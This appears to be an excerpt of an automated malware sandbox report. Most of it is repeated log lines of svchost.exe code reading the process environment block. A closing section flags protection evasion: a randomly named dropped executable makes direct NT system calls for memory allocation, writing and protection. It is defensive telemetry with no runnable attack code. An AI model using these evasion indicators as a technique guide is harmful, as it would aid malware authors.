                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840535 mov eax, dword ptr fs:[00000030h]2_2_03840535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840535 mov eax, dword ptr fs:[00000030h]2_2_03840535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840535 mov eax, dword ptr fs:[00000030h]2_2_03840535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385E53E mov eax, dword ptr fs:[00000030h]2_2_0385E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385E53E mov eax, dword ptr fs:[00000030h]2_2_0385E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385E53E mov eax, dword ptr fs:[00000030h]2_2_0385E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385E53E mov eax, dword ptr fs:[00000030h]2_2_0385E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385E53E mov eax, dword ptr fs:[00000030h]2_2_0385E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03838550 mov eax, dword ptr fs:[00000030h]2_2_03838550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03838550 mov eax, dword ptr fs:[00000030h]2_2_03838550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386656A mov eax, dword ptr fs:[00000030h]2_2_0386656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386656A mov eax, dword ptr fs:[00000030h]2_2_0386656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386656A mov eax, dword ptr fs:[00000030h]2_2_0386656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038EA49A mov eax, dword ptr fs:[00000030h]2_2_038EA49A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038364AB mov eax, dword ptr fs:[00000030h]2_2_038364AB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038644B0 mov ecx, dword ptr fs:[00000030h]2_2_038644B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038BA4B0 mov eax, dword ptr fs:[00000030h]2_2_038BA4B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038304E5 mov ecx, dword ptr fs:[00000030h]2_2_038304E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03868402 mov eax, dword ptr fs:[00000030h]2_2_03868402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03868402 mov eax, dword ptr fs:[00000030h]2_2_03868402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03868402 mov eax, dword ptr fs:[00000030h]2_2_03868402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382E420 mov eax, dword ptr fs:[00000030h]2_2_0382E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382E420 mov eax, dword ptr fs:[00000030h]2_2_0382E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382E420 mov eax, dword ptr fs:[00000030h]2_2_0382E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382C427 mov eax, dword ptr fs:[00000030h]2_2_0382C427
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B6420 mov eax, dword ptr fs:[00000030h]2_2_038B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B6420 mov eax, dword ptr fs:[00000030h]2_2_038B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B6420 mov eax, dword ptr fs:[00000030h]2_2_038B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B6420 mov eax, dword ptr fs:[00000030h]2_2_038B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B6420 mov eax, dword ptr fs:[00000030h]2_2_038B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B6420 mov eax, dword ptr fs:[00000030h]2_2_038B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B6420 mov eax, dword ptr fs:[00000030h]2_2_038B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386A430 mov eax, dword ptr fs:[00000030h]2_2_0386A430
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386E443 mov eax, dword ptr fs:[00000030h]2_2_0386E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386E443 mov eax, dword ptr fs:[00000030h]2_2_0386E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386E443 mov eax, dword ptr fs:[00000030h]2_2_0386E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386E443 mov eax, dword ptr fs:[00000030h]2_2_0386E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386E443 mov eax, dword ptr fs:[00000030h]2_2_0386E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386E443 mov eax, dword ptr fs:[00000030h]2_2_0386E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386E443 mov eax, dword ptr fs:[00000030h]2_2_0386E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386E443 mov eax, dword ptr fs:[00000030h]2_2_0386E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038EA456 mov eax, dword ptr fs:[00000030h]2_2_038EA456
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382645D mov eax, dword ptr fs:[00000030h]2_2_0382645D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385245A mov eax, dword ptr fs:[00000030h]2_2_0385245A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038BC460 mov ecx, dword ptr fs:[00000030h]2_2_038BC460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385A470 mov eax, dword ptr fs:[00000030h]2_2_0385A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385A470 mov eax, dword ptr fs:[00000030h]2_2_0385A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385A470 mov eax, dword ptr fs:[00000030h]2_2_0385A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840BBE mov eax, dword ptr fs:[00000030h]2_2_03840BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840BBE mov eax, dword ptr fs:[00000030h]2_2_03840BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E4BB0 mov eax, dword ptr fs:[00000030h]2_2_038E4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E4BB0 mov eax, dword ptr fs:[00000030h]2_2_038E4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03850BCB mov eax, dword ptr fs:[00000030h]2_2_03850BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03850BCB mov eax, dword ptr fs:[00000030h]2_2_03850BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03850BCB mov eax, dword ptr fs:[00000030h]2_2_03850BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03830BCD mov eax, dword ptr fs:[00000030h]2_2_03830BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03830BCD mov eax, dword ptr fs:[00000030h]2_2_03830BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03830BCD mov eax, dword ptr fs:[00000030h]2_2_03830BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DEBD0 mov eax, dword ptr fs:[00000030h]2_2_038DEBD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03838BF0 mov eax, dword ptr fs:[00000030h]2_2_03838BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03838BF0 mov eax, dword ptr fs:[00000030h]2_2_03838BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03838BF0 mov eax, dword ptr fs:[00000030h]2_2_03838BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385EBFC mov eax, dword ptr fs:[00000030h]2_2_0385EBFC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038BCBF0 mov eax, dword ptr fs:[00000030h]2_2_038BCBF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03904B00 mov eax, dword ptr fs:[00000030h]2_2_03904B00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h]2_2_038AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h]2_2_038AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h]2_2_038AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h]2_2_038AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h]2_2_038AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h]2_2_038AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h]2_2_038AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h]2_2_038AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h]2_2_038AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385EB20 mov eax, dword ptr fs:[00000030h]2_2_0385EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385EB20 mov eax, dword ptr fs:[00000030h]2_2_0385EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F8B28 mov eax, dword ptr fs:[00000030h]2_2_038F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F8B28 mov eax, dword ptr fs:[00000030h]2_2_038F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E4B4B mov eax, dword ptr fs:[00000030h]2_2_038E4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E4B4B mov eax, dword ptr fs:[00000030h]2_2_038E4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03902B57 mov eax, dword ptr fs:[00000030h]2_2_03902B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03902B57 mov eax, dword ptr fs:[00000030h]2_2_03902B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03902B57 mov eax, dword ptr fs:[00000030h]2_2_03902B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03902B57 mov eax, dword ptr fs:[00000030h]2_2_03902B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C6B40 mov eax, dword ptr fs:[00000030h]2_2_038C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C6B40 mov eax, dword ptr fs:[00000030h]2_2_038C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FAB40 mov eax, dword ptr fs:[00000030h]2_2_038FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D8B42 mov eax, dword ptr fs:[00000030h]2_2_038D8B42
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03828B50 mov eax, dword ptr fs:[00000030h]2_2_03828B50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DEB50 mov eax, dword ptr fs:[00000030h]2_2_038DEB50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382CB7E mov eax, dword ptr fs:[00000030h]2_2_0382CB7E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h]2_2_0383EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h]2_2_0383EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h]2_2_0383EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h]2_2_0383EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h]2_2_0383EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h]2_2_0383EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h]2_2_0383EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h]2_2_0383EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h]2_2_0383EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03904A80 mov eax, dword ptr fs:[00000030h]2_2_03904A80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03868A90 mov edx, dword ptr fs:[00000030h]2_2_03868A90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03838AA0 mov eax, dword ptr fs:[00000030h]2_2_03838AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03838AA0 mov eax, dword ptr fs:[00000030h]2_2_03838AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03886AA4 mov eax, dword ptr fs:[00000030h]2_2_03886AA4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03886ACC mov eax, dword ptr fs:[00000030h]2_2_03886ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03886ACC mov eax, dword ptr fs:[00000030h]2_2_03886ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03886ACC mov eax, dword ptr fs:[00000030h]2_2_03886ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03830AD0 mov eax, dword ptr fs:[00000030h]2_2_03830AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03864AD0 mov eax, dword ptr fs:[00000030h]2_2_03864AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03864AD0 mov eax, dword ptr fs:[00000030h]2_2_03864AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386AAEE mov eax, dword ptr fs:[00000030h]2_2_0386AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386AAEE mov eax, dword ptr fs:[00000030h]2_2_0386AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038BCA11 mov eax, dword ptr fs:[00000030h]2_2_038BCA11
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386CA24 mov eax, dword ptr fs:[00000030h]2_2_0386CA24
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385EA2E mov eax, dword ptr fs:[00000030h]2_2_0385EA2E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03854A35 mov eax, dword ptr fs:[00000030h]2_2_03854A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03854A35 mov eax, dword ptr fs:[00000030h]2_2_03854A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386CA38 mov eax, dword ptr fs:[00000030h]2_2_0386CA38
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03836A50 mov eax, dword ptr fs:[00000030h]2_2_03836A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03836A50 mov eax, dword ptr fs:[00000030h]2_2_03836A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03836A50 mov eax, dword ptr fs:[00000030h]2_2_03836A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03836A50 mov eax, dword ptr fs:[00000030h]2_2_03836A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03836A50 mov eax, dword ptr fs:[00000030h]2_2_03836A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03836A50 mov eax, dword ptr fs:[00000030h]2_2_03836A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03836A50 mov eax, dword ptr fs:[00000030h]2_2_03836A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840A5B mov eax, dword ptr fs:[00000030h]2_2_03840A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840A5B mov eax, dword ptr fs:[00000030h]2_2_03840A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386CA6F mov eax, dword ptr fs:[00000030h]2_2_0386CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386CA6F mov eax, dword ptr fs:[00000030h]2_2_0386CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386CA6F mov eax, dword ptr fs:[00000030h]2_2_0386CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DEA60 mov eax, dword ptr fs:[00000030h]2_2_038DEA60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038ACA72 mov eax, dword ptr fs:[00000030h]2_2_038ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038ACA72 mov eax, dword ptr fs:[00000030h]2_2_038ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]2_2_038429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]2_2_038429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]2_2_038429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]2_2_038429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]2_2_038429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]2_2_038429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]2_2_038429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]2_2_038429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]2_2_038429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]2_2_038429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]2_2_038429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]2_2_038429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]2_2_038429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038309AD mov eax, dword ptr fs:[00000030h]2_2_038309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038309AD mov eax, dword ptr fs:[00000030h]2_2_038309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B89B3 mov esi, dword ptr fs:[00000030h]2_2_038B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B89B3 mov eax, dword ptr fs:[00000030h]2_2_038B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B89B3 mov eax, dword ptr fs:[00000030h]2_2_038B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C69C0 mov eax, dword ptr fs:[00000030h]2_2_038C69C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A9D0 mov eax, dword ptr fs:[00000030h]2_2_0383A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A9D0 mov eax, dword ptr fs:[00000030h]2_2_0383A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A9D0 mov eax, dword ptr fs:[00000030h]2_2_0383A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A9D0 mov eax, dword ptr fs:[00000030h]2_2_0383A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A9D0 mov eax, dword ptr fs:[00000030h]2_2_0383A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A9D0 mov eax, dword ptr fs:[00000030h]2_2_0383A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038649D0 mov eax, dword ptr fs:[00000030h]2_2_038649D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FA9D3 mov eax, dword ptr fs:[00000030h]2_2_038FA9D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038BE9E0 mov eax, dword ptr fs:[00000030h]2_2_038BE9E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038629F9 mov eax, dword ptr fs:[00000030h]2_2_038629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038629F9 mov eax, dword ptr fs:[00000030h]2_2_038629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AE908 mov eax, dword ptr fs:[00000030h]2_2_038AE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AE908 mov eax, dword ptr fs:[00000030h]2_2_038AE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038BC912 mov eax, dword ptr fs:[00000030h]2_2_038BC912
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03828918 mov eax, dword ptr fs:[00000030h]2_2_03828918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03828918 mov eax, dword ptr fs:[00000030h]2_2_03828918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B892A mov eax, dword ptr fs:[00000030h]2_2_038B892A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C892B mov eax, dword ptr fs:[00000030h]2_2_038C892B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B0946 mov eax, dword ptr fs:[00000030h]2_2_038B0946
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03904940 mov eax, dword ptr fs:[00000030h]2_2_03904940
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03856962 mov eax, dword ptr fs:[00000030h]2_2_03856962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03856962 mov eax, dword ptr fs:[00000030h]2_2_03856962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03856962 mov eax, dword ptr fs:[00000030h]2_2_03856962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0387096E mov eax, dword ptr fs:[00000030h]2_2_0387096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0387096E mov edx, dword ptr fs:[00000030h]2_2_0387096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0387096E mov eax, dword ptr fs:[00000030h]2_2_0387096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D4978 mov eax, dword ptr fs:[00000030h]2_2_038D4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D4978 mov eax, dword ptr fs:[00000030h]2_2_038D4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038BC97C mov eax, dword ptr fs:[00000030h]2_2_038BC97C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03830887 mov eax, dword ptr fs:[00000030h]2_2_03830887
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038BC89D mov eax, dword ptr fs:[00000030h]2_2_038BC89D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385E8C0 mov eax, dword ptr fs:[00000030h]2_2_0385E8C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039008C0 mov eax, dword ptr fs:[00000030h]2_2_039008C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FA8E4 mov eax, dword ptr fs:[00000030h]2_2_038FA8E4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386C8F9 mov eax, dword ptr fs:[00000030h]2_2_0386C8F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386C8F9 mov eax, dword ptr fs:[00000030h]2_2_0386C8F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038BC810 mov eax, dword ptr fs:[00000030h]2_2_038BC810
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03852835 mov eax, dword ptr fs:[00000030h]2_2_03852835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03852835 mov eax, dword ptr fs:[00000030h]2_2_03852835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03852835 mov eax, dword ptr fs:[00000030h]2_2_03852835
                Source: C:\Users\user\Desktop\tfWjjV1LdT.exeCode function: 0_2_006E80A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,0_2_006E80A9
                Source: C:\Users\user\Desktop\tfWjjV1LdT.exeCode function: 0_2_006BA155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_006BA155
                Source: C:\Users\user\Desktop\tfWjjV1LdT.exeCode function: 0_2_006BA124 SetUnhandledExceptionFilter,0_2_006BA124

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exeNtAllocateVirtualMemory: Direct from: 0x76EF48ECJump to behavior
                Source: C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exeNtQueryAttributesFile: Direct from: 0x76EF2E6CJump to behavior
                Source: C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exeNtQueryVolumeInformationFile: Direct from: 0x76EF2F2CJump to behavior
                Source: C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exeNtQuerySystemInformation: Direct from: 0x76EF48CCJump to behavior
                Source: C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exeNtOpenSection: Direct from: 0x76EF2E0CJump to behavior
                Source: C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exeNtDeviceIoControlFile: Direct from: 0x76EF2AECJump to behavior
                Source: C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BECJump to behavior
                Source: C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exeNtQueryInformationToken: Direct from: 0x76EF2CACJump to behavior
                Source: C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exeNtCreateFile: Direct from: 0x76EF2FECJump to behavior
                Source: C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exeNtOpenFile: Direct from: 0x76EF2DCCJump to behavior
                Source: C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exeNtTerminateThread: Direct from: 0x76EF2FCCJump to behavior
                Source: C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exeNtOpenKeyEx: Direct from: 0x76EF2B9CJump to behavior
                Source: C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exeNtSetInformationProcess: Direct from: 0x76EF2C5CJump to behavior
                Source: C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exeNtProtectVirtualMemory: Direct from: 0x76EF2F9CJump to behavior
                Source: C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exeNtWriteVirtualMemory: Direct from: 0x76EF2E3CJump to behavior
                Source: C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exeNtNotifyChangeKey: Direct from: 0x76EF3C2CJump to behavior
                Source: C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exeNtCreateMutant: Direct from: 0x76EF35CCJump to behavior
